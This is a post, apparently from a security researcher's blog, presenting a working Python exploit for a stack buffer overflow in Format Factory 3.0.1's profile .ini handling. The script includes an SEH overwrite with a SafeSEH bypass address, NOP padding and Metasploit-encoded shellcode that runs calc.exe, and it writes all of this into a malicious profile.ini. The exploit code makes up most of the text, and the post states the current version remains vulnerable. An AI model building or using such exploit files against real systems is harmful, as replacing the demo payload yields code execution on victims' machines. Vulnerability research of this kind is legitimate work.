Here’s a working exploit for an already disclosed bug – including SafeSEH Bypass – and for the actual version, which is still vulnerable. Sadly.
#!/usr/bin/python # Exploit Title: Format Factory v3.0.1 Profile File Handling Buffer Overflow # Version: <= 3.0.1 # Date: 2012-11-19 # Author: Julien Ahrens (@MrTuxracer) # Homepage: https://www.rcesecurity.com # Software Link: http://www.pcfreetime.com # Tested on: Windows XP SP3 Professional German # Notes: - # Howto: Copy .ini to %USERPROFILE%\My Documents\FormatFactory\PicCustom from struct import pack file="profile.ini" junk1="\xCC" * 260 nseh="\xeb\x06\x90\x90" eip=pack('<L',0x024C1923) # CALL DWORD PTR SS:[EBP-C] - SafeSEH Bypass nops="\x90" * 10 junk2="\xCC" * 10000 # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00' shellcode = ("\xba\x68\x3e\x85\x1f\xd9\xca\xd9\x74\x24\xf4\x58\x29\xc9" + "\xb1\x33\x31\x50\x12\x83\xe8\xfc\x03\x38\x30\x67\xea\x44" + "\xa4\xee\x15\xb4\x35\x91\x9c\x51\x04\x83\xfb\x12\x35\x13" + "\x8f\x76\xb6\xd8\xdd\x62\x4d\xac\xc9\x85\xe6\x1b\x2c\xa8" + "\xf7\xad\xf0\x66\x3b\xaf\x8c\x74\x68\x0f\xac\xb7\x7d\x4e" + "\xe9\xa5\x8e\x02\xa2\xa2\x3d\xb3\xc7\xf6\xfd\xb2\x07\x7d" + "\xbd\xcc\x22\x41\x4a\x67\x2c\x91\xe3\xfc\x66\x09\x8f\x5b" + "\x57\x28\x5c\xb8\xab\x63\xe9\x0b\x5f\x72\x3b\x42\xa0\x45" + "\x03\x09\x9f\x6a\x8e\x53\xe7\x4c\x71\x26\x13\xaf\x0c\x31" + "\xe0\xd2\xca\xb4\xf5\x74\x98\x6f\xde\x85\x4d\xe9\x95\x89" + "\x3a\x7d\xf1\x8d\xbd\x52\x89\xa9\x36\x55\x5e\x38\x0c\x72" + "\x7a\x61\xd6\x1b\xdb\xcf\xb9\x24\x3b\xb7\x66\x81\x37\x55" + "\x72\xb3\x15\x33\x85\x31\x20\x7a\x85\x49\x2b\x2c\xee\x78" + "\xa0\xa3\x69\x85\x63\x80\x86\xcf\x2e\xa0\x0e\x96\xba\xf1" + "\x52\x29\x11\x35\x6b\xaa\x90\xc5\x88\xb2\xd0\xc0\xd5\x74" + "\x08\xb8\x46\x11\x2e\x6f\x66\x30\x4d\xee\xf4\xd8\xbc\x95" + "\x7c\x7a\xc1") poc="Type=" + junk1 + nseh + eip + nops + shellcode + junk2 try: print "[*] Creating exploit file...\n"; writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!"; except: print "[!] Error while creating file!";
An important side – note! The bug has not been properly researched:
The Bugtraq – Posting states:
Vulnerable Module(s): [+] INI - Width & Height - Size & Buffer Validation
But all other .ini values are vulnerable too. A closer look at the disassembly clearly shows that they are. The vulnerable function is called on every single value of the .ini file: